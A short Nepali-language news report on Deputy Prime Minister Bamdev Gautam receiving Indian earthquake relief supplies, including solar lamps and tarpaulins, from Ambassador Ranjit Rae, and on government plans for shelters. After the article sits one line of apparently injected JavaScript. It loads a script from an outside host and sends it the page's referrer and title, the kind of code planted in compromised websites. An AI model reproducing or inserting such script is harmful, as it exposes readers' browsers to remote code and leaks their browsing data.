उपप्रधान एवं गृहमन्त्री बामदेव गौतमले सरकारको अबको मुख्य योजनासुरक्षित आश्रय स्थल निर्माण गर्ने रहेको बताउनुभएको छ। सोमबार काठमाडौंको नेशनल ट्रेडिङमा भारतिय राहत सामाग्री ग्रहण गर्दे मन्त्री गौतमले भूकम्पपिडितका लागी अस्थायी र स्थायी आश्रय स्थल बनाउने कार्य सुरु भईसकेको बताउनुभएको हो। उहाले बिपतको घडिमा छिमेकि राष्ट्रहरुले गरेको सहयोगको प्रसंसा गर्नुभयो। मन्त्री गौतमले बिभिन्न निकायबाट प्राप्त भएका राहत तथा अन्य सहयोगको दुरुपयोग हुन नदिने उल्लेख गर्दे आगामी दिनमा पनि सहयोगको अपेक्षा गर्नुभयो।
कार्यक्रममा नेपालका लागी भारतिय राजदुत रञ्जीत रेले नेपाल र नेपालीको दुखमा सदैव साथ दिने भन्दै सहयोग निरन्तर रहने बताउनुभयो। कार्यक्रममा राजदत रञ्जीत रेले मन्त्री गौतमलाई बिभिन्न राहत सामाग्री हस्तान्तरण गर्नुभएको थियो। भारतले बिभिन्न १७ वटा ट्रकमा ल्याईएका सोलार वती , ठूलो मात्रामा त्रिपाल , सरसफाईका सामाग्रीहरु लगाएतका अन्य सामान हस्तान्तरण गरेको हो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;